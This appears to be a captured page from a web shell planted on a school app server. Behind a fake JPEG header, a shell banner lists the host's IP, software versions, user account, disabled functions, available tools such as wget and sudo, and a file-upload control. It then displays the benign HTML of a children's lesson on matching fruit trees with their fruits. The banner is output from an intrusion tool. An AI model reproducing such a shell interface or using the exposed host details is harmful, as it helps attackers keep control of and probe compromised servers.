????JFIF??x?x????'
| Server IP : 79.136.114.73 / Your IP : 216.73.216.191 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old7/Html/LevelD/Category3/ |
Upload File : |
<!doctype html>
<html>
<head>
<title>Match the trees with fruits</title>
<script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
<style type="text/css">
table
{
border: 0px solid;
}
</style>
<script>
function page_preLoad()
{
shared_setDeviceTypeLevelCategoryLastLesson(Level.D, Category.No3);
shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.D, Category.No3, 11), true, true);
shared_setFooterTable('id_tblFooter', true, true, false, true, true);
var ids_boxes = ['id_dropBox_imgOranges', 'id_dropBox_imgMangoes', 'id_dropBox_imgPapayas', 'id_dropBox_imgBananas'];
var ids_headings = ['id_td_heading1'];
var ids_spans = ['id_span_imgMangoes', 'id_span_imgPapayas', 'id_span_imgOranges', 'id_span_imgBananas'];
var ids_All = ids_boxes.concat(ids_headings);
shared_adjust_fontSize_for_ids_all_devices(ids_boxes, 80);
shared_adjust_fontSize_for_ids_all_devices(ids_headings, 70);
shared_init_dropBox_tds_with_drag_here(ids_boxes);
shared_init_dropping_spans(ids_spans);
var id_tables_array = ['id_table1'];
shared_border_collapse_for_tables_for_all(id_tables_array);
}
function page_onLoad()
{
}
function btnPrevious_click()
{
window.location = 'LevelDCat3Lesson10.html';
}
function btnNext_click()
{
window.location = 'LevelDCat3Lesson12.html';
}
function btnHome_click()
{
shared_btnHomeCategories_click('LevelD');
}
function DragDrop(id_dropBox, id_imgElement, ids_array)
{
if (shared_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array))
{
shared_dragDropImageAndIsMovedTrue(shared_currentDropingId, id_dropBox, id_imgElement);
isAllInfosMovedShowClapsAnimation();
shared_set_currentDropingId_draggbleToFalse();
}
else
{
shared_resetCurrentDroppingPosition(id_dropBox);
}
}
function isAllInfosMovedShowClapsAnimation()
{
var ids_boxes = ['id_dropBox_imgOranges', 'id_dropBox_imgMangoes', 'id_dropBox_imgPapayas', 'id_dropBox_imgBananas'];
shared_is_all_infos_filled_show_claps_animationWithIsFilled(ids_boxes);
}
</script>
</head>
<body onload="page_onLoad()">
<div id="shared_id_div_claps_image">
</div>
<table id="id_tblMainiPadBody" border="1px" cellspacing="0" cellpadding="0">
<tr height="8%">
<td>
<div id="id_tblHeader"></div>
</td>
</tr>
<tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
<td>
<table width="100%" height="100%" border="1" cellspacing="0" cellpadding="2%">
<tr>
<td>
<table id="id_table1" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
<tr>
<td align="center" style="border-bottom:0px">
<table id="id_tblSection2" width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr height="8%">
<td>
<table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
<tr>
<td id="id_td_heading1" class="shared_style_black_24px_bold_padding_left_2_percent" style="border:none">Trees give us fruits.<br>
Match the trees with the fruits they give.
</td>
</tr>
</table>
</td>
</tr>
<tr height="*">
<td>
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="60%" style="border-left: 0px; border-right: 0px">
<table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
<tr>
<td width="*" style="border-right: 0px; border-left:none">
<table width="100%" height="100%" border="0" cellspacing="2%" cellpadding="0" style="padding-top: 1%; padding-bottom: 1%">
<tr id="id_tr_imgOranges" height="25%"
ondragover="shared_highlight('id_dropBox_imgOranges'); shared_allowDrop_web(event)"
ondragleave="shared_un_highlight('id_dropBox_imgOranges')"
ondrop="DragDrop('id_dropBox_imgOranges', 'id_imgOranges', ['id_span_imgOranges'])">
<td align="center" width="60%">
<img id="id_imgChip" src="../../../img/LevelD/Category3/LevelDCat3Lesson11/orangeTree.png" width="60%" alt="" draggable="false"/>
</td>
<td id="id_dropBox_imgOranges" class="shared_style_red_24px_bold" width="*"></td>
</tr>
<tr id="id_tr_imgMangoes" height="25%"
ondragover="shared_highlight('id_dropBox_imgMangoes'); shared_allowDrop_web(event)"
ondragleave="shared_un_highlight('id_dropBox_imgMangoes')"
ondrop="DragDrop('id_dropBox_imgMangoes', 'id_imgMangoes', ['id_span_imgMangoes'])">
<td align="center" width="60%">
<img id="id_imgChair" src="../../../img/LevelD/Category3/LevelDCat3Lesson11/mangoTree.png" width="60%" alt="" draggable="false"/>
</td>
<td id="id_dropBox_imgMangoes" class="shared_style_red_24px_bold" width="*">
</td>
</tr>
<tr id="id_tr_imgPapayas" height="25%"
ondragover="shared_highlight('id_dropBox_imgPapayas'); shared_allowDrop_web(event)"
ondragleave="shared_un_highlight('id_dropBox_imgPapayas')"
ondrop="DragDrop('id_dropBox_imgPapayas', 'id_imgPapayas', ['id_span_imgPapayas'])">
<td align="center" width="60%">
<img id="id_imgCherry" src="../../../img/LevelD/Category3/LevelDCat3Lesson11/papayaTree.png" width="50%" alt="" draggable="false"/>
</td>
<td id="id_dropBox_imgPapayas" class="shared_style_red_24px_bold" width="*">
</td>
</tr>
<tr id="id_tr_imgBananas" height="*"
ondragover="shared_highlight('id_dropBox_imgBananas'); shared_allowDrop_web(event)"
ondragleave="shared_un_highlight('id_dropBox_imgBananas')"
ondrop="DragDrop('id_dropBox_imgBananas', 'id_imgBananas', ['id_span_imgBananas'])">
<td align="center" width="60%">
<img id="id_imgChild" src="../../../img/LevelD/Category3/LevelDCat3Lesson11/bananaTree.png" width="50%" alt="" draggable="false"/>
</td>
<td id="id_dropBox_imgBananas" class="shared_style_red_24px_bold" width="*"></td>
</tr>
</table>
</td>
<td width="5%" style="border-left: 0px; border-right: 0px"></td>
</tr>
</table>
</td>
<td width="*" style="border-left: 0px">
<table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
<tr>
<td style="border-right: 0px">
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr height="25%">
<td id="id_td_imgPapayas" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
<span id="id_span_imgPapayas">
<img id="id_imgPapayas" src="../../../img/LevelD/Category3/LevelDCat3Lesson11/papayas.png" width="50%" alt=""/>
</span>
</td>
</tr>
<tr height="25%">
<td id="id_td_imgBananas" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
<span id="id_span_imgBananas">
<img id="id_imgBananas" src="../../../img/LevelD/Category3/LevelDCat3Lesson11/bananas.png" width="45%" alt=""/>
</span>
</td>
</tr>
<tr height="25%">
<td id="id_td_imgMangoes" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
<span id="id_span_imgMangoes">
<img id="id_imgMangoes" src="../../../img/LevelD/Category3/LevelDCat3Lesson11/mangoes.png" width="45%" alt=""/>
</span>
</td>
</tr>
<tr height="*">
<td id="id_td_imgOranges" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
<span id="id_span_imgOranges">
<img id="id_imgOranges" src="../../../img/LevelD/Category3/LevelDCat3Lesson11/oranges.png" width="35%" alt=""/>
</span>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
<tr height="8%">
<td>
<div id="id_tblFooter"></div>
</td>
</tr>
</table>
<script>
page_preLoad();
new webkit_draggable('id_span_imgOranges', {handle : 'id_td_imgOranges', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
new webkit_draggable('id_span_imgBananas', {handle : 'id_td_imgBananas', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
new webkit_draggable('id_span_imgPapayas', {handle : 'id_td_imgPapayas', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
new webkit_draggable('id_span_imgMangoes', {handle : 'id_td_imgMangoes', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
webkit_drop.add('id_tr_imgOranges', {onOver : function(){shared_highlight('id_dropBox_imgOranges')}, onOut : function(){shared_un_highlight('id_dropBox_imgOranges')}, onDrop : function(){DragDrop('id_dropBox_imgOranges', 'id_imgOranges', ['id_span_imgOranges'])}});
webkit_drop.add('id_tr_imgBananas', {onOver : function(){shared_highlight('id_dropBox_imgBananas')}, onOut : function(){shared_un_highlight('id_dropBox_imgBananas')}, onDrop : function(){DragDrop('id_dropBox_imgBananas', 'id_imgBananas', ['id_span_imgBananas'])}});
webkit_drop.add('id_tr_imgPapayas', {onOver : function(){shared_highlight('id_dropBox_imgPapayas')}, onOut : function(){shared_un_highlight('id_dropBox_imgPapayas')}, onDrop : function(){DragDrop('id_dropBox_imgPapayas', 'id_imgPapayas', ['id_span_imgPapayas'])}});
webkit_drop.add('id_tr_imgMangoes', {onOver : function(){shared_highlight('id_dropBox_imgMangoes')}, onOut : function(){shared_un_highlight('id_dropBox_imgMangoes')}, onDrop : function(){DragDrop('id_dropBox_imgMangoes', 'id_imgMangoes', ['id_span_imgMangoes'])}});
</script>
</body>
</html>